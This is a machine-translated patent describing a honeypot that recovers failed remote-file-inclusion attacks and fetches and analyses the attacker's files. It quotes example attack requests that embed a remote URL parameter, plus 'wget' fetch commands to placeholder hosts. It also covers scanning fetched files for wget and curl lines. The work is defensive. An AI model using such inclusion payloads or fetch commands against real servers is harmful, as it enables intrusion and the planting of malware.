JP5456636B2 - File collection monitoring method, file collection monitoring apparatus, and file collection monitoring program - Google Patents

Description

  The present invention relates to a file collection monitoring method, a file collection monitoring apparatus, and a file collection monitoring program.

  Conventionally, with the spread of the Internet, cyber attacks on servers that manage personal information and distribute applications are increasing rapidly. Typical examples of cyber attacks include DDoS (Distributed Denial of Services) attacks using malware, which is an attack tool program used by attackers to gain unauthorized access to authorized users' servers and terminals, spam transmission, and information theft. It has been. Many of these attacks are implemented by hijacking existing servers and attacking other servers as a stepping stone.

  In order to cope with these attacks, an access control technique is known in which communication is controlled in accordance with the data of a packet transmitted and received between servers and the contents of a header. For example, in the access control technology, a server monitoring function is constructed by installing a firewall function and a transfer data monitoring function in a packet transfer device such as a router, and packet communication is controlled by the built server monitoring function.

  In this access control technique, first, a security vendor collects and analyzes an existing attack, and signatures a pattern of a transmission message that an attacker can take to the server. In the access control technology, the server monitoring function protects the server from unauthorized access by filtering outgoing messages that match the signature using the server monitoring function.

  Here, as a technique for collecting and analyzing existing attacks, for example, a honeypot is known. Honeypots are classified into a low interactive type and a high interactive type. Low interactive honeypots monitor attacks by emulating the operation of software such as specific operating systems and applications. Highly interactive honeypots monitor attacks with real software that is vulnerable.

  In other words, the low-interaction honeypot is limited in its emulated range, so that it can collect attack information relatively safely without being affected by the attack, but the information that can be collected is limited. Is done. On the other hand, since the behavior of the high-interaction honeypot is observed after being actually attacked, there is a possibility that damage due to the attack may occur, but more detailed information at the time of attack is observed than the low-interaction honeypot it can. As a result, the highly interactive honeypot is more useful for the amount of attack information that can be collected.

Satoshi Yagi, Naoto Tanimoto, Takeo Haruo, Mitsutoshi Ito, “Improvement of Attack Information Collection Method in High Interactive Web Honeypot” Information Processing Society of Japan, Computer Security Symposium 2009

  However, in the above-described conventional technology, there is a problem that detection accuracy regarding an attack on an attack target is lowered. Specifically, in a highly interactive honeypot according to the prior art, an attack occurs because the location of the program targeted as an attack target and the path described in the request destination URL (Uniform Resource Locator) do not match. May fail. In such a case, it is only possible to send a message or the like that cannot accept the attack to the attacker. That is, the highly interactive honeypot according to the related art cannot collect a lot of information related to the attack.

  Moreover, even if an attack is deliberately successful in order to collect a lot of information related to the attack, an attack whose path differs greatly from the actual location of the program will fail, so almost no information related to the attack can be collected. . For these reasons, even if a large number of attacks are collected in the conventional technology, the ratio of the amount of attack information that can be used for defense in the total amount of attack information decreases, so the detection accuracy for attacks on the attack target decreases. To do.

  Therefore, the technology disclosed in the present application has been made in view of the above, and a file collection monitoring method, a file collection monitoring device, and a file collection monitoring program capable of improving the detection accuracy related to an attack on an attack target. The purpose is to provide.

  In order to solve the above-described problems and achieve the object, in the disclosed method, the receiving step receives an operation execution request from the outside, which is a request for causing the server terminal to acquire an arbitrary file on the network. Then, the determination step determines whether or not file acquisition has occurred by the server terminal in response to the operation execution request received by the reception step. When the determination step determines that file acquisition by the server terminal does not occur in the determination step, the operation execution request is analyzed, and a unified resource position specification that is a position of the arbitrary file in the network Identify children. Then, the generation step generates a file acquisition request that is a request for acquiring the arbitrary file using the unified resource location specifier specified by the specifying step. Then, the acquisition step acquires the arbitrary file by sending the file acquisition request generated in the generation step to the network.

  The disclosed method makes it possible to improve the detection accuracy regarding an attack on an attack target.

FIG. 1 is a diagram illustrating an example of a network model to which the file collection monitoring apparatus according to the first embodiment is applied. FIG. 2 is a diagram for explaining an example of the configuration of the file collection monitoring apparatus according to the first embodiment. FIG. 3 is a diagram for explaining the table 1 stored in the transfer destination specifying unit. FIG. 4 is a diagram for explaining the table 2 stored in the transfer destination specifying unit. FIG. 5 is a diagram for explaining an example of a list of destination URLs stored by the access data management unit. FIG. 6 is a diagram for explaining an example of processing by the character string analysis environment. FIG. 7 is a diagram for explaining an example of generation of a file acquisition request by the data receiving unit access monitoring unit. FIG. 8 is a diagram for explaining an example of processing according to the operating environment. FIG. 9 is a sequence diagram illustrating a procedure of request analysis processing performed by the file collection monitoring apparatus according to the first embodiment. FIG. 10 is a sequence diagram illustrating the procedure of the file acquisition request transmission process performed by the file collection monitoring apparatus according to the first embodiment. FIG. 11 is a sequence diagram illustrating the procedure of the file analysis process performed by the file collection monitoring apparatus according to the first embodiment. FIG. 12 is a sequence diagram illustrating a procedure of data storage processing by the file collection monitoring apparatus according to the first embodiment. FIG. 13 is a diagram for explaining an example of a table used for the decoding process. FIG. 14 is a diagram for explaining a network model 1 different from the first embodiment. FIG. 15 is a diagram for explaining a network model 2 different from the first embodiment. FIG. 16 is a diagram illustrating the computer 1000 that executes the file collection monitoring program according to the present embodiment.

  Hereinafter, embodiments of a file collection monitoring method, a file collection monitoring apparatus, and a file collection monitoring program disclosed in the present application will be described in detail with reference to the accompanying drawings. Note that the file collection monitoring method, file collection monitoring apparatus, and file collection monitoring program disclosed in the present application are not limited to the following embodiments.

[Configuration of File Collection Monitoring Apparatus According to Embodiment 1]
First, the configuration of the file collection monitoring apparatus according to the first embodiment will be described. FIG. 1 is a diagram illustrating an example of a network model to which the file collection monitoring apparatus according to the first embodiment is applied. In the network model shown in FIG. 1, the network 1 includes a network 2, a network 3, and a file collection monitoring device 6.

  The network 1 is, for example, a wide area network such as the Internet, or a relatively narrow area network such as a corporate network, and accommodates the network 2 and the network 3 as shown in FIG. The network 2 and the network 3 accommodate the user terminal 21 and the server terminal 31, respectively, as shown in FIG. In FIG. 1, one user terminal 21 and one server terminal 31 are shown for each of the network 2 and the network 3, but actually, the network 2 and the network 3 include a plurality of user terminals and servers. A terminal is accommodated.

  The user terminal 21 communicates with other communication devices arranged on the network 1. For example, the user terminal 21 communicates with the file collection monitoring device 6. The server terminal 31 communicates with other communication devices arranged on the network 1. For example, the server terminal 31 communicates with the file collection monitoring device 6.

  Here, an example of a cyber attack in the network model shown in FIG. 1 will be described. For example, the attacker prepares a malware distribution server that downloads malware by infecting the server terminal 31 with malware using the user terminal 21. Then, the attacker uses a search engine or the like to specify a server loaded with a vulnerable program.

  Thereafter, the attacker uses the user terminal 21 to transmit an exploit code using the vulnerability of the program to the identified server, thereby causing the identified server to download malware from the malware distribution server. In this way, the attacker transmits a request for executing a predetermined process to the server loaded with the vulnerable program, and causes the server that has received the request to execute a response to the request.

  As shown in FIG. 1, the file collection monitoring device 6 according to the first embodiment includes a server terminal unit 61, a data transfer unit 62, and a data reception unit 63. The file collection monitoring device 6 stores various information related to the above-described requests and responses. collect. For example, the file collection monitoring device 6 builds a highly interactive honeypot and collects various information related to requests and responses. Details of the file collection monitoring device 6 will be described with reference to FIG. FIG. 2 is a diagram for explaining an example of the configuration of the file collection monitoring apparatus 6 according to the first embodiment.

  The server terminal unit 61 has the same function as a normal server terminal. For example, the server terminal unit 61 functions as a Web server. In such a case, the server terminal unit 61 has various software and databases used for building a Web server such as a Web application. For example, when a highly interactive honeypot is constructed in the file collection monitoring device 6, a vulnerable application is installed in the server terminal unit 61.

  For example, when functioning as a Web server, the server terminal unit 61 executes a response to an HTTP (Hypertext Transfer Protocol) request transmitted by an attacker using the user terminal 21. Here, the server terminal unit 61 transmits an error message to the user terminal 21 as a response, for example, when the path described in the HTTP request does not match the location of the vulnerable application in its own device.

  Hereinafter, a case where the server terminal unit 61 functions as a Web server will be described as an example. Note that the server terminal unit 61 is not limited to a Web server, and may function as an FTP server, for example. Hereinafter, an HTTP request may be described as a request.

  As shown in FIG. 2, the data transfer unit 62 includes a server transmission / reception access monitoring unit 621, a transfer destination specifying unit 622, a data receiving unit access monitoring unit 623, an access data management unit 624, and an analysis data collection unit 625. Have

  The server transmission / reception access monitoring unit 621 has a relay function between the server terminal unit 61 and the networks 2 and 3. Specifically, the server transmission / reception access monitoring unit 621 relays data transmitted / received between the server terminal unit 61 and the networks 2 and 3, stores the relayed data, and copies the stored data. It transmits to the access data management part 624 or the analysis data collection part 625 mentioned later.

  For example, the server transmission / reception access monitoring unit 621 transmits a request received from the user terminal 21 to the server terminal unit 61, stores the content of the request, and sends a copy of the stored request to the analysis data collection unit 625 described later. Send. The server transmission / reception access monitoring unit 621 transmits the response received from the server terminal unit 61 to the network 2 or 3, stores the content of the response, and stores a copy of the stored response, which will be described later. Send to.

  Here, the server transmission / reception access monitoring unit 621 determines whether the response received from the server terminal unit 61 is an error message. For example, the server transmission / reception access monitoring unit 621 determines whether or not the response is an error message based on whether or not an error code is included in the response.

  If the response is an error message, the server transmission / reception access monitoring unit 621 copies the request corresponding to the response, and transmits the copied request to the transfer destination specifying unit 622 described later.

  On the other hand, when the response is not an error message and the server terminal unit 61 transmits a file acquisition request in response to the request, the server transmission / reception access monitoring unit 621 transmits the file acquisition request to the network 2 or 3, and The URL included in the acquisition request is extracted and transmitted to the access data management unit 624 described later. Further, the server transmission / reception access monitoring unit 621 transmits the file acquired by the file acquisition request and the URL included in the file acquisition request to the analysis data collection unit 625 described later.

  Furthermore, the server transmission / reception access monitoring unit 621 holds the state of the server terminal unit 61 before receiving a request from the user terminal 21 and transmits a response to the network 2 or 3. Is restored to the state before receiving the request. That is, the server transmission / reception access monitoring unit 621 returns the server terminal unit 61 to the state before receiving the attack.

  The transfer destination identifying unit 622 refers to the contents of the request and file received from the server transmission / reception access monitoring unit 621 and the data receiving unit access monitoring unit 623, which will be described later, and determines the transfer destination of the request and file. Specifically, the transfer destination specifying unit 622 has a table for determining a transfer destination of a request and a file. When a request or a file is received, the request or the file can be analyzed with reference to the table. Determine the forwarding destination. In the following, after the processing when a request is received, the processing when a file is received will be described.

  First, a process when the transfer destination specifying unit 622 receives a request will be described. FIG. 3 is a diagram for explaining the table 1 stored in the transfer destination specifying unit 622. For example, as illustrated in FIG. 3, the transfer destination specifying unit 622 includes a table 1 in which a program and an operating environment are associated as a table to be referred to when a request is received.

  For example, as shown in FIG. 3, the transfer destination specifying unit 622 has a table 1 in which “program: PHP (Hypertext Preprocessor)” and “operating environment: operating environment 632” are associated with each other. The above example means that an operating environment 632 of the data receiving unit 63 described later is constructed so as to function as an operating environment of the PHP program. Similarly, as illustrated in FIG. 3, the transfer destination specifying unit 622 includes a table 1 in which “program: ASP (Application Service Provider)” and “operating environment: operating environment 633” are associated with each other. The table 1 is set in advance when the operating environment is constructed by the administrator of the file collection monitoring device 6.

  When the transfer destination specifying unit 622 receives a request from the server transmission / reception access monitoring unit 621, the transfer destination specifying unit 622 first refers to the extension of the file name of the request destination and specifies a program that responds to the request. Then, the transfer destination specifying unit 622 refers to the table 1 and determines whether or not there is an operating environment corresponding to the specified program.

  Here, when the operating environment corresponding to the specified program is in Table 1, the transfer destination specifying unit 622 transfers the request received from the server transmission / reception access monitoring unit 621 to the operating environment corresponding to the program. For example, the transfer destination specifying unit 622 refers to the table 1 and transfers a request responding to the PHP program to the operating environment 632.

  On the other hand, when the operating environment corresponding to the specified program is not in the table 1, or when the program cannot be specified, the transfer destination specifying unit 622 analyzes the request received from the server transmission / reception access monitoring unit 621, which will be described later. Transfer to environment 631.

  Next, processing when the transfer destination specifying unit 622 receives a file will be described. The timing at which the transfer destination specifying unit 622 receives a file will be described in detail later. FIG. 4 is a diagram for explaining the table 2 stored in the transfer destination specifying unit 622.

  For example, as illustrated in FIG. 4, the transfer destination specifying unit 622 includes a table 2 in which a program language and an operating environment are associated as a table to be referred to when a file is received. For example, as shown in FIG. 4, the transfer destination specifying unit 622 has a table 2 in which “program language: PHP” and “operating environment: operating environment 632” are associated with each other. The above example means that an operating environment 632 of the data receiving unit 63 described later is constructed so as to function as an operating environment of the PHP script. Similarly, the transfer destination specifying unit 622 has a table 2 in which “program language: Perl” and “operating environment: operating environment 633” are associated with each other, as shown in FIG. The table 2 is set in advance when the operating environment is constructed by the administrator of the file collection monitoring device 6.

  When the transfer destination specifying unit 622 receives a file from the data receiving unit access monitoring unit 623 described later, the transfer destination specifying unit 622 first specifies in what programming language the content of the file is described. For example, the transfer destination specifying unit 622 specifies in what programming language the content of the file is described from the character string of the function described in the file. Then, the transfer destination specifying unit 622 refers to the table 2 and determines whether or not there is an operating environment corresponding to the specified program language.

  Here, when the operating environment corresponding to the specified program language is in the table 2, the transfer destination specifying unit 622 sets the file received from the data receiving unit access monitoring unit 623 described later to the operating environment corresponding to the program language. Forward. For example, the transfer destination specifying unit 622 refers to the table 2 and transfers a file described in PHP to the operating environment 632.

  The transfer destination specifying unit 622 has a function of searching for an environment in which an operation occurs by transmitting the same request or file to another transfer destination when the request or file cannot be operated at the transfer destination. It is possible to have. In such a case, by setting the character string analysis environment 631, which will be described later, to be selected preferentially as another transfer destination, an operation can be generated early.

  The data receiving unit access monitoring unit 623 receives a character string or file acquisition request from the data receiving unit 63 described later. Here, when a character string is received from the data receiving unit 63, the data receiving unit access monitoring unit 623 generates a file acquisition request using the received character string as a destination URL and transmits the file acquisition request to the network 2 or 3. On the other hand, when a file acquisition request is received from the data reception unit 63, the data reception unit access monitoring unit 623 transmits the received file acquisition request to the network 2 or 3. The file acquisition request generated by the data reception unit access monitoring unit 623, the character string received from the data reception unit 63, and the file acquisition request will be described in detail later.

  Then, the data receiving unit access monitoring unit 623 receives a file corresponding to the transmitted file acquisition request from the network 2 or 3. Further, the data reception unit access monitoring unit 623 transmits the received file and the destination URL of the acquisition request for the file to the analysis data collection unit 625 described later. Further, the data reception unit access monitoring unit 623 transmits a file acquisition request and transmits a destination URL at which the file is received to an access data management unit 624 described later.

  Here, the data reception unit access monitoring unit 623 transmits the file acquisition request destination URL as the URL of the non-acquisition file before sending the file acquisition request so that the non-acquisition file is not acquired. It is determined whether or not there is. Specifically, when the data reception unit access monitoring unit 623 receives a character string or file acquisition request, the data reception unit access monitoring unit 623 requests the access data management unit 624 to determine whether or not the destination URL is stored. If not, a file acquisition request is transmitted to the network 2 or 3.

  The access data management unit 624 stores URLs of files that are not to be acquired. Specifically, the access data management unit 624 stores the URL of an acquired file or the URL of a file whose acquisition is prohibited in advance as the URL of a file that is not an acquisition target.

  For example, the access data management unit 624 stores the destination URL received from the server transmission / reception access monitoring unit 621 and the data reception unit access monitoring unit 623 as the URL of the acquired file. FIG. 5 is a diagram for explaining an example of a list of destination URLs stored by the access data management unit 624. For example, as shown in FIG. 5, the access data management unit 624 performs “http://ex3.com/z.txt”, “http://ex4.com/z.txt”, “http: // ex8 A list of destination URLs including “.com / z.txt” and “http://ex10.com/z.txt” is stored.

  Further, the access data management unit 624 stores the URL specified by the administrator of the file collection monitoring device 6 as the URL of a file that is prohibited from being acquired in advance. For example, the access data management unit 624 stores “.html” as the URL of a file whose acquisition is prohibited in advance.

  When the access data management unit 624 receives an inquiry from the data reception unit access monitoring unit 623 as to whether or not the destination URL is recorded, the access data management unit 624 refers to the list of stored URLs and stores the destination URL. Determine whether or not. Then, the access data management unit 624 notifies the data reception unit access monitoring unit 623 of the determination result.

  For example, when the access data management unit 624 receives an inquiry as to whether or not the destination URL is recorded, the access data management unit 624 refers to the list of URLs of the acquired files shown in FIG. 5 and stores the same URL as the destination URL. It is determined whether or not.

  When the access data management unit 624 receives an inquiry as to whether or not the destination URL is recorded, the access data management unit 624 compares the destination URL with the URL of the file that has been prohibited from being acquired in advance. Then, the access data management unit 624 determines whether or not the destination URL is a URL of a file that is not the acquisition target, using “all match”, “backward match”, and “partial match” of the URL.

  Note that “all matches” means that the destination URL and the URL that is not subject to file acquisition completely match. Further, “backward match” means that the character string in the destination URL matches the designated character string. “Partial match” means that an arbitrary character string included in the destination URL matches the designated character string.

  For example, the access data management unit 624 determines a destination URL having “.html” at the end of the destination URL as a URL of a file not to be acquired. As described above, when the access data management unit 624 determines the URL by “full match”, “backward match”, and “partial match” of the URL, each entry in the list of URLs of the files not to be acquired is set to “ A flag indicating which of “all matches”, “backward matches”, and “partial matches” is applied is stored in association with each other. That is, when all the flags are set, all monitoring methods are applied.

  Note that the URL stored in the access data management unit 624 may be the URL of an acquired file, the URL of a file that is prohibited from being acquired in advance, or both.

  The analysis data collection unit 625 stores various types of information related to requests and responses. Specifically, the analysis data collection unit 625 stores the file, destination URL, request and response contents received from the server transmission / reception access monitoring unit 621 and the data reception unit access monitoring unit 623.

  As shown in FIG. 2, the data receiving unit 63 includes a character string analysis environment 631, an operation environment 632, and an operation environment 633. The character string analysis environment 631 extracts an arbitrary character string from the request received from the transfer destination specifying unit 622 and transmits the extracted character string to the data receiving unit access monitoring unit 623. Specifically, the character string analysis environment 631 extracts a character string from an arbitrary character as a head to another arbitrary character. FIG. 6 is a diagram for explaining an example of processing by the character string analysis environment 631.

  For example, as shown in FIG. 6, the character string analysis environment 631 first receives the request “http://www.ex.com/a/b/c.zzz?dir=http: //ex1.com/z.txt? ”to extract the input data“ dir = http: //ex1.com/z.txt? ” Then, the character string analysis environment 631 extracts the character string “http://ex1.com/z.txt” up to “?” Starting with “http”, and extracts the extracted character string “http: // ex1.com/z.txt "is transmitted to the data receiving unit access monitoring unit 623.

  For example, when the data reception unit access monitoring unit 623 receives the character string “http://ex1.com/z.txt” from the character string analysis environment 631, the file acquisition request “#wget http” is received as illustrated in FIG. : //ex1.com/z.txt ". FIG. 7 is a diagram for explaining an example of generation of a file acquisition request by the data reception unit access monitoring unit 623.

  Here, for example, “https” or “ftp” is used in addition to “http” as an arbitrary character at the beginning. In addition to “?”, For example, “;” is used as the character after the character string to be extracted. In other words, the file collection monitoring device 6 uses the above-described character string to enable automatic and high-precision URL identification as described below.

  A character string (for example, “http”, “ftp”, etc.) specifying a method is essential at the top of the URL. Furthermore, a specific character string (for example, “?” Immediately after the value of the input data) is specified in the request in order to transfer the input data to the program on the server terminal. Therefore, when extracting the URL from the input data of the request, it is possible to specify the URL automatically and with high accuracy by designating the leading character string and the immediately following character string.

  Further, when the character string analysis environment 631 receives a file from the transfer destination specifying unit 622, the character string analysis environment 631 determines whether or not there is an instruction sequence for acquiring another file in the file. For example, the character string analysis environment 631 determines whether there is a “wget command” or a “curl command” in the file. If there is a command sequence for acquiring another file in the received file, the character string analysis environment 631 extracts the command sequence and transmits it to the data reception unit access monitoring unit 623.

  The operating environment 632 and the operating environment 633 are operating environments that operate with respect to an arbitrary program or an arbitrary program language. For example, the operating environment 632 is constructed by the administrator as the operating environment of the PHP program. FIG. 8 is a diagram for explaining an example of processing according to the operating environment. As shown in FIG. 8, the operating environment 632 receives a request “http://www.ex.com/a/b/c.php?dir=http: including the extension“ php ”from the transfer destination identifying unit 622. //ex2.com/z.txt? ”is received, a file acquisition request“ #wget http://ex2.com/z.txt ”is extracted and transmitted to the data receiving unit access monitoring unit 623.

  In the above-described example, the case where two operating environments are used has been described. However, the disclosed technique is not limited to this, and the number of operating environments can be arbitrarily changed, for example, three or more. The operating environment may be provided. For example, when an operating environment for newly operating a Python script is added, the operating environment is added to the data receiving unit 63 and the table 2 of the transfer destination specifying unit 622 may be updated.

  In the above-described example, whether the file acquisition has failed depends on whether the server transmission / reception access monitoring unit 621 has transmitted a request to the server terminal unit 61 and received an error message from the server terminal unit 61. The case of determination has been described. However, the disclosed technique is not limited to this. For example, when the server transmission / reception access monitoring unit 621 receives a request, the server terminal unit 61 determines whether the file acquisition fails. It may be.

  In such a case, for example, the server transmission / reception access monitoring unit 621 holds the data of the path structure on the server terminal unit 61 in advance. Then, when the server transmission / reception access monitoring unit 621 receives the request, the server transmission / reception access monitoring unit 621 compares the path of the destination URL with the data of the stored path structure. Here, the server transmission / reception access monitoring unit 621 determines that the file acquisition by the server terminal unit 61 fails when the path described in the destination URL of the request does not exist on the server terminal unit 61. In this case, the server transmission / reception access monitoring unit 621 transmits a copy of the request to the transfer destination specifying unit 622 without transmitting the request to the server terminal unit 61. As described above, the disclosed technique can also be applied to a method of detecting in advance a failure of file acquisition by the server terminal.

[Procedure for Processing by File Collection Monitoring Device According to Embodiment 1]
Next, a processing procedure by the file collection monitoring apparatus 6 according to the first embodiment will be described.

[Procedure for request analysis processing by file collection monitoring apparatus according to embodiment 1]
FIG. 9 is a sequence diagram illustrating a procedure of request analysis processing performed by the file collection monitoring apparatus 6 according to the first embodiment. As shown in FIG. 9, in the file collection monitoring device 6 according to the first embodiment, when receiving a request from the network (step S101), the server transmission / reception access monitoring unit 621 transmits the request to the server terminal unit 61 (step S101). S102).

  When the server transmission / reception access monitoring unit 621 receives a response from the server terminal unit 61 (step S103), the server transmission / reception access monitoring unit 621 transmits the response to the network (step S104) and determines whether the response is an error message (step S105). If the response is an error message (Yes at Step S105), the server transmission / reception access monitoring unit 621 transmits a copy of the request to the transfer destination specifying unit 622 (Step S106).

  Upon receiving the request copy, the transfer destination specifying unit 622 specifies the transfer destination (step S107) and transmits the request copy (step S108). When receiving the copy of the request, the character string analysis environment 631, the operation environment 632, or the operation environment 633 extracts a character string or a file acquisition request (step S109). If the response is not an error message in the determination in step 105 (Yes in step S205), the file collection monitoring device 6 does not execute the request analysis process.

[Procedure for File Acquisition Request Transmission Processing by File Collection Monitoring Device According to Embodiment 1]
FIG. 10 is a sequence diagram illustrating the procedure of the file acquisition request transmission process performed by the file collection monitoring apparatus 6 according to the first embodiment. As illustrated in FIG. 10, in the file collection monitoring apparatus 6 according to the first embodiment, the character string analysis environment 631, the operation environment 632, or the operation environment 633 extracts a character string or a file acquisition request (step S109). The received character string or file acquisition request is transmitted to the data receiving unit access monitoring unit 623 (step S201).

  When receiving the character string or file acquisition request, the data reception unit access monitoring unit 623 requests the access data management unit 624 to determine the URL (step S202). When the access data management unit 624 is requested by the data reception unit access monitoring unit 623 to determine the URL, the access data management unit 624 determines whether the URL is stored (step S203), and the determination result is transmitted to the data reception unit access monitoring unit 623. (Step S204).

  When receiving the determination result, the data reception unit access monitoring unit 623 determines whether or not the URL is stored (step S205). If the URL is not stored (No at step S205), the data receiving unit access monitoring unit 623 receives the file acquisition request with the character string as the destination URL, or the operating environment 632 or the operating environment 633. The file acquisition request is transmitted to the network (step S206). If the URL is stored in the determination in step S205 (Yes in step S205), the file collection monitoring device 6 does not execute the subsequent processing.

  Note that the URL list used for determining the URL in step S204 is either the URL of an acquired file, the URL of a file that is prohibited from being acquired in advance, or both.

[Procedure of file analysis processing by file collection monitoring apparatus according to embodiment 1]
FIG. 11 is a sequence diagram illustrating the procedure of the file analysis process performed by the file collection monitoring apparatus 6 according to the first embodiment. As illustrated in FIG. 11, in the file collection monitoring apparatus 6 according to the first embodiment, when the data reception unit access monitoring unit 623 receives a file according to a file acquisition request from the network (step S301), the access data management unit File acquisition is notified to 624 (step S302), and the acquired file is transmitted to the transfer destination specifying unit 622 (step S304).

  When the access data management unit 624 receives the file acquisition notification from the data reception unit access monitoring unit 623, the access data management unit 624 stores the URL of the file acquisition destination (step S303). When receiving the file from the data receiving unit access monitoring unit 623, the transfer destination specifying unit 622 specifies the transfer destination (step S305), and transfers the file to the specified transfer destination (step S306). When receiving the file, the character string analysis environment 631, the operation environment 632, or the operation environment 633 extracts a character string or a file acquisition request (step S307). Note that the procedure for transmitting a file acquisition request extracted from a file received from the network is the same as that shown in FIG.

[Procedure of data storage processing by file collection monitoring apparatus according to embodiment 1]
FIG. 12 is a sequence diagram illustrating a procedure for storing data by the file collection monitoring apparatus 6 according to the first embodiment. As shown in FIG. 12, in the file collection monitoring apparatus 6 according to the first embodiment, the server transmission / reception access monitoring unit 621 receives data from the network (step S401), and transmits data corresponding thereto (step S402). Information on the communication is transmitted to the analysis data collection unit 625 (step S403).

  Then, the data receiving unit access monitoring unit 623 receives data from the network (step S404), transmits data corresponding thereto (step S405), and transmits information on the communication to the analysis data collecting unit 625 (step S406). . Then, the analysis data collection unit 625 stores the received information (step S407).

[Effect of Example 1]
As described above, according to the first embodiment, the server transmission / reception access monitoring unit 621 receives a request for causing the server terminal to acquire an arbitrary file on the network. Further, the server transmission / reception access monitoring unit 621 determines whether or not file acquisition has occurred by the server terminal in response to the request. When the data reception unit 63 determines that the server transmission / reception access monitoring unit 621 determines that the file acquisition by the server terminal does not occur, the request is analyzed and the URL that is the position of an arbitrary file in the network is specified. The data receiving unit access monitoring unit 623 generates a file acquisition request that is a request for acquiring an arbitrary file using the URL specified by the data receiving unit 63. Furthermore, an arbitrary file is acquired by sending a file acquisition request generated by the data reception unit access monitoring unit 623 to the network. Therefore, the file collection monitoring device 6 according to the first embodiment can collect communication information related to the request and communication information related to the response even when the server terminal unit 61 fails to respond to the request. It is possible to improve the detection accuracy related to the attack on the attack target.

  Further, according to the first embodiment, the character string analysis environment 631 specifies, as a URL, a character string from a predetermined first character string to a second character string determined separately in the request character string. To do. Therefore, the file collection monitoring device 6 according to the first embodiment can respond to various requests and can collect a large amount of powerful information related to cyber attacks.

  In addition, according to the first embodiment, the transfer destination specifying unit 622 refers to the extension included in the request, specifies the operating environment in which the operation corresponding to the request is executed, and responds to the specified operating environment according to the request. The URL is specified by executing the above operation. Therefore, the file collection monitoring apparatus 6 according to the first embodiment can collect information on responses to requests more accurately.

  Further, according to the first embodiment, the character string analysis environment 631 is determined separately from the first character string predetermined in the character string included in an arbitrary file acquired by the data reception unit access monitoring unit 623. A character string up to immediately before the second character string is specified as a URL. Therefore, the file collection monitoring apparatus 6 according to the first embodiment can collect more information from the acquired file, and can collect more communication information related to the request and more communication information related to the response. .

  Further, according to the first embodiment, the transfer destination specifying unit 622 refers to the characteristics of the character string included in an arbitrary file acquired by the data receiving unit access monitoring unit 623 and executes an operation according to the file. The unified resource location specifier is specified by specifying an operating environment to be executed and causing the specified operating environment to execute an operation according to the file. Therefore, the file collection monitoring apparatus 6 according to the first embodiment can collect more information from the acquired file, and can collect more information of responses to requests more accurately.

  Further, according to the first embodiment, the data reception unit access monitoring unit 623 refers to the access data management unit 624 that stores the URL before sending the file acquisition request to the network, and is currently acquiring the file And the file acquisition request is transmitted to the network on the condition that the URL is not stored in the access data management unit 624. Therefore, the file collection monitoring apparatus 6 according to the first embodiment can suppress generation of an unnecessary file acquisition request.

  Although several embodiments have been described so far, the technology disclosed in the present application is not limited to these embodiments. That is, these embodiments can be implemented in various other forms, and various omissions, replacements, and changes can be made.

(1) Decoding Process In the above-described first embodiment, the case where a request or a file is directly analyzed has been described. However, the disclosed technique is not limited to this. For example, the encoded request may be analyzed after being decoded. In such a case, each environment in the transfer destination specifying unit 622 or the data receiving unit 63 may be provided with a function for executing the decoding process. FIG. 13 is a diagram for explaining an example of a table used for the decoding process.

  For example, as shown in FIG. 13, a table in which character string features are associated with decoding methods is stored in advance in each environment in the transfer destination specifying unit 622 or the data receiving unit 63. Then, each environment in the transfer destination specifying unit 622 or the data receiving unit 63 is made to decode the request by a decoding method corresponding to the character string characteristic of the request. For example, for a request that cannot be simply operated and has a certain number of characters or more, the BASE 64 performs decoding processing in each environment in the transfer destination specifying unit 622 or the data receiving unit 63. To. Therefore, the file collection monitoring device 6 can perform analysis on the encoded request, and can collect more information by analyzing a wider range of data.

(2) Network Model In the first embodiment described above, the case where a network model in which the file collection monitoring device 6, the network 2, and the network 3 are accommodated in the network 1 has been described. However, the disclosed technique is not limited to this, and can be applied to various types of network models. Hereinafter, a network model different from that of the first embodiment will be described.

  FIG. 14 is a diagram for explaining a network model 1 different from the first embodiment. As illustrated in FIG. 14, the network 1 accommodates a network 2, a network 3, and a network 4. The network 2 and the network 3 accommodate a user terminal 21 and a server terminal 31, respectively. In the network 4, a server terminal 41, a server terminal 42, and a data receiving unit 63 are accommodated. Then, as shown in FIG. 14, the topology is configured so that the access from the network 2 and the network 3 to the server terminal 41 and the server terminal 42 passes through the data transfer unit 62.

  That is, the data transfer unit 62 can monitor all requests from the user terminal 21 to the server terminal 41 or the server terminal 42 and responses from the server terminal 41 or the server terminal 42, and displays various information related to the requests and responses. Can be collected.

  The network 2 can be mounted on one or a plurality of physical servers as a virtual network. In such a case, the data transfer unit 62, the server terminal 41, and the server terminal 42 can be constructed on a virtual terminal constructed by a virtualization technology such as VMWare or Xen.

  FIG. 15 is a diagram for explaining a network model 2 different from the first embodiment. As illustrated in FIG. 14, the network 1 accommodates a network 2, a network 3, and a network 4. The network 2 and the network 3 accommodate a user terminal 21 and a server terminal 31, respectively. The network 4 accommodates a server terminal 41. Then, as shown in FIG. 15, the topology is configured so that access from the network 2 and the network 3 to the server terminal 41 passes through the data transfer processing function 7.

  By arranging the data transfer unit 62 and the data receiving unit 63 in the data transfer processing function 7, it is possible to monitor all requests from the user terminal 21 to the server terminal 41 and responses from the server terminal 41. Various information related to requests and responses can be collected.

(3) Character String Analysis Environment and Operation Environment In the first embodiment described above, the case where the character string analysis environment 631 and the operation environments 632 and 633 are arranged in the data receiving unit 63 has been described. However, the disclosed technique is not limited to this. For example, only the character string analysis environment 631 may be arranged. Alternatively, only the operating environments 632 and 633 may be arranged. When only the character string analysis environment 631 is arranged, the transfer destination specifying unit 622 in the data transfer unit 62 can be removed.

(4) Generation of File Acquisition Request A case has been described in which the data reception unit access monitoring unit 623 generates a file acquisition request with a character string received from the character string analysis environment 631 as a destination URL. However, the disclosed technique is not limited to this. For example, the file acquisition request may be generated in which the character string extracted by the character string analysis environment 631 is used as the destination URL.

(5) System configuration, etc. For example, the specific form of distribution / integration of each device (for example, the form of FIG. 2) is not limited to the one shown in the figure, and all or a part thereof depends on various loads and usage conditions. Thus, it can be functionally or physically distributed and integrated in arbitrary units. For example, the server transmission / reception access monitoring unit 621 and the data receiving unit access monitoring unit 623 may be integrated as one access monitoring unit, while the access data management unit determines whether the URL is stored or not. You may distribute to the determination part which determines, and the notification part which notifies a determination result.

(6) File Collection Monitoring Program The file collection monitoring device 6 described in the above embodiment can be realized by executing a program prepared in advance on a computer. Therefore, an example of a computer that executes a file collection monitoring program that realizes the same function as the file collection monitoring apparatus 6 shown in FIG. 2 will be described below.

